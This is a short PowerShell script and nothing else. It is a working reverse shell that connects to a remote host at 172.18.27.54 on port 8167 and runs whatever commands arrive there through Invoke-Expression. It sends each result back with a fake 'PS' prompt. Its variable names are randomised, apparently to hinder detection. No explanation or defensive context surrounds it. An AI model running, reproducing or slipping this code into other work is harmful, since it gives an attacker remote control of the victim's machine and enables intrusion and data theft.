$bCGlWOz7DoN3nPM = New-Object System.Net.Sockets.TCPClient("172.18.27.54",8167);
$zp = $bCGlWOz7DoN3nPM.GetStream();
[byte[]]$3 = 0..65535|%{0};
while(($pYGiXHDjvTV1ebF5 = $zp.Read($3, 0, $3.Length)) -ne 0){
    $6wgb2Zw5P2JBXpSam8M26dJ = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($3,0, $pYGiXHDjvTV1ebF5);
    $5MkWX9Tg8yaiEjN7qH4JF0fv = (iex $6wgb2Zw5P2JBXpSam8M26dJ 2>&1 | Out-String );
    $7k9kdPt1mkPFiQr7 = $5MkWX9Tg8yaiEjN7qH4JF0fv + "PS " + (pwd).Path + "> ";
    $sendbytesENvOHG39S64BzghW2 = ([text.encoding]::ASCII).GetBytes($7k9kdPt1mkPFiQr7);
    $zp.Write($sendbytesENvOHG39S64BzghW2,0,$sendbytesENvOHG39S64BzghW2.Length);
    $zp.Flush();
};
$bCGlWOz7DoN3nPM.Close();
